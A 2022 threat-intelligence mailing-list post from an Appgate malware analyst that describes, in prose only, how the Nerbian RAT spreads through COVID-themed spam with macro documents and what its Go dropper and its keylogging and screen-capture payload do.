[MART] - Daily Diary #508 - Meet Nerbian RAT

CTAS-MAT ctas-mat at appgate.com
Wed May 11 21:08:36 UTC 2022 

Hello,

I hope everyone is doing well!

Below is the entry for today.

05/11/2022 - Diary entry #508:

Recently, a new RAT (Remote Access Trojan) named Nerbian RAT was discovered. Nerbian RAT is disseminated via spam with Covid 19 related subjects, representing the WHO (World Health Organization). In the email message, it attaches a malicious document (a Microsoft Word Document), sometimes compressed within a RAR file.

After the victim opens and enables the macro content, it executes a BAT file containing a PowerShell code that downloads a malware dropper written in Go language. The dropper is packed with UPX, a very common packer, and it has the responsibility to check the victim's location and environment. Then, it downloads the NerbianRAT, sets persistence, and finally executes it.

The dropper also imports functionalities from other GoLang projects to manage some components like Windows COM, Win32 API, Windows WMI, and a specific Go library that is an anti-VM framework used by Red Teams and Pentesters.

The final payload has features that are activated by its configuration encrypted in the binary itself. It has keylogging and screen-capture capabilities and communicates with its C2 over SSL. Nerbian RAT sends all the data encrypted, except the session key that is probably used as the campaign ID.

NerbianRAT is not considered a modern or complex threat, but it shows how threat actors are using Go language and third-parties libraries to quickly weaponize their campaigns. These threats also can easily be used as a malware-as-a-service to exfiltrate information and then deploy additional malware like a Ransomware or a Wiper.

Kind Regards,

[https://d3aafpijpsak2t.cloudfront.net/images/Signature/logo@2x.png]<https://www.appgate.com/>

[https://d3aafpijpsak2t.cloudfront.net/images/Signature/likedin@2x.png]<https://www.linkedin.com/company/appgate-security/>     [https://d3aafpijpsak2t.cloudfront.net/images/Signature/twitter@2x.png] <https://twitter.com/AppgateSecurity>   [https://d3aafpijpsak2t.cloudfront.net/images/Signature/youtube@2x.png] <https://www.youtube.com/channel/UC-8GvxcZbm-R3EJNl8jYjiQ>



Felipe Tarijon de Almeida
Malware Analyst
Appgate

E: felipe.tarijon at appgate.com<mailto:felipe.tarijon at appgate.com>


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.immunityinc.com/pipermail/mart/attachments/20220511/7078ec1d/attachment.htm>

More information about the MART mailing list